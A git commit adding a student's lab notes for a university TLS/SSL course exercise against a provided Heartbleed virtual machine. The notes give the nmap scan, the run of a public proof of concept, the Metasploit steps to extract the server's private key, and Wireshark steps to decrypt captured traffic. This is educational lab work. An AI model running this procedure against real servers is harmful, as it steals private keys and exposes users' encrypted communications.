Add notes for Lab 5
This commit is contained in:
parent
f97eec55df
commit
8177c14f3f
4 changed files with 111 additions and 0 deletions
1
Lab 5 - TLS & SSL/.gitignore
vendored
Normal file
1
Lab 5 - TLS & SSL/.gitignore
vendored
Normal file
|
@ -0,0 +1 @@
|
||||||
|
keylog.txt
|
BIN
Lab 5 - TLS & SSL/HTTP Stream.png
Normal file
BIN
Lab 5 - TLS & SSL/HTTP Stream.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 367 KiB |
110
Lab 5 - TLS & SSL/README.md
Normal file
110
Lab 5 - TLS & SSL/README.md
Normal file
|
@ -0,0 +1,110 @@
|
||||||
|
# TLS & SSL
|
||||||
|
All tasks in this lab are solved using the `heartbleed` virtual machine provided by CVUT:
|
||||||
|
|
||||||
|
<https://owncloud.cesnet.cz/index.php/s/WZuwlgevX2dhzYf>
|
||||||
|
|
||||||
|
## Configuration
|
||||||
|
Boot up the virtual machine and (if necessary in `tty1` using `CTRL`+`Alt`+`1`) determine it's IP address:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
ip address show
|
||||||
|
```
|
||||||
|
|
||||||
|
Add local DNS entry for VM:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts
|
||||||
|
```
|
||||||
|
|
||||||
|
Try accessing the website under <https://heartbleed.ssb>
|
||||||
|
|
||||||
|
## Vulnerability Scan
|
||||||
|
Scan for vulnerabilities using:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
sudo nmap -sT -sV -p443 --script=vuln heartbleed.ssb
|
||||||
|
```
|
||||||
|
|
||||||
|
Result includes:
|
||||||
|
|
||||||
|
```
|
||||||
|
| ssl-heartbleed:
|
||||||
|
| VULNERABLE:
|
||||||
|
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|
||||||
|
| State: VULNERABLE
|
||||||
|
| Risk factor: High
|
||||||
|
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
||||||
|
|
|
||||||
|
| References:
|
||||||
|
| http://cvedetails.com/cve/2014-0160/
|
||||||
|
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|
||||||
|
|_ http://www.openssl.org/news/secadv_20140407.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
## Find & Run Proof of Concept
|
||||||
|
```sh
|
||||||
|
cd ~
|
||||||
|
git clone git@github.com:sensepost/heartbleed-poc.git
|
||||||
|
cd heartbleed-poc
|
||||||
|
python2 ./heartbleed-poc.py heartbleed.ssb
|
||||||
|
```
|
||||||
|
|
||||||
|
Result:
|
||||||
|
|
||||||
|
```
|
||||||
|
WARNING: server heartbleed.ssb returned more data than it should - server is vulnerable!
|
||||||
|
```
|
||||||
|
|
||||||
|
## Get Private Key
|
||||||
|
Open up msfconsole using the corresponding command:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
msfconsole
|
||||||
|
```
|
||||||
|
|
||||||
|
Configure heartbleed module:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
search heartbleed
|
||||||
|
use auxiliary/scanner/ssl/openssl_heartbleed
|
||||||
|
set RHOSTS heartbleed.ssb
|
||||||
|
set ACTION KEYS
|
||||||
|
```
|
||||||
|
|
||||||
|
### Check
|
||||||
|
Check whether system is vulnerable:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
check
|
||||||
|
```
|
||||||
|
|
||||||
|
Output:
|
||||||
|
```
|
||||||
|
The target appears to be vulnerable.
|
||||||
|
```
|
||||||
|
|
||||||
|
### Attack
|
||||||
|
Run attack and get private key:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
run
|
||||||
|
```
|
||||||
|
|
||||||
|
### Decrypt Traffic
|
||||||
|
1. Close Firefox completely
|
||||||
|
3. Store pre-shared master secret:
|
||||||
|
```sh
|
||||||
|
SSLKEYLOGFILE=./keylog.txt firefox
|
||||||
|
```
|
||||||
|
4. Configure Wireshark
|
||||||
|
1. In `Edit` => `Preferences` under `RSA Keys`, add the private key from the previous attack
|
||||||
|
2. In the preferences window under `Protocols` => `TLS`, set `(Pre)-Master-Secret log filename` to the name of the private key file from the previous attack
|
||||||
|
5. Start a capture on the corresponding network interface
|
||||||
|
|
||||||
|
Traffic is now decrypted (notice the green HTTP packets):
|
||||||
|
|
||||||
|
![](Traffic.png)
|
||||||
|
|
||||||
|
View HTTP communication using {Right Click on HTTP packet} => `Follow` => `HTTP Stream`:
|
||||||
|
|
||||||
|
![Alt text](HTTP%20Stream.png)
|
BIN
Lab 5 - TLS & SSL/Traffic.png
Normal file
BIN
Lab 5 - TLS & SSL/Traffic.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 367 KiB |
Loading…
Reference in a new issue